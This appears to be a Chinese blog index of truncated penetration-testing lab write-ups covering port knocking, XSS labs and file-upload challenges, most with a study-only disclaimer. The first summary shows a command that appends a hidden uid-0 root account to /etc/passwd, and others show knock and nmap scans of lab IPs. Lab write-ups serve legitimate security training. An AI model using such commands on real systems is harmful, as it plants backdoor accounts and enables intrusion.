皇帽讲绿帽带法技巧

摘要： openssl passwd -1 -salt bmfx bmfx $1$bmfx$HuKLopGkC8MwDIxBcpRnr/ echo "echo 'bmfx:\$1\$bmfx\$HuKLopGkC8MwDIxBcpRnr/:0:0:root:/root:/bin/bash' >> /etc/ 阅读全文

摘要： sudo apt-get install konckd knocker knockpy -y knock -v 192.168.56.114 159:tcp 27391:tcp 4:tcp knock -v 192.168.56.114 4:tcp 27391:tcp 159:tcp nmap -s 阅读全文

摘要： 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp- 阅读全文

摘要： xss-labs下载地址：https://github.com/do0dl3/xss-labs 搭建环境是使用的phpstudy搭建 level1 根据源代码显示，可以知道没有任何过滤直接通过name参数传递前端的信息，并且可由客户端控制，所以得出如下测试payload http://10.0.1. 阅读全文

摘要： 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 测试的靶机是作者自己购买的vps搭建的环境，使用了白名单形式访问！ Pass-18 查看本关卡代码 $is_upload = false; $msg = null; if(isse 阅读全文

摘要： 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 测试的靶机是作者自己购买的vps搭建的环境，使用了白名单形式访问！ Pass-17 查看本关卡代码 $is_upload = false; $msg = null; if (iss 阅读全文

摘要： 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 测试的靶机是作者自己购买的vps搭建的环境，使用了白名单形式访问！ Pass-14 查看本关卡代码 function getReailFileType($filename){ $f 阅读全文

摘要： 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp- 阅读全文

摘要： 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 测试的靶机是作者自己购买的vps搭建的环境，使用了白名单形式访问！ Pass-11 查看本关卡代码 $is_upload = false; $msg = null; if (iss 阅读全文

摘要： 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp- 阅读全文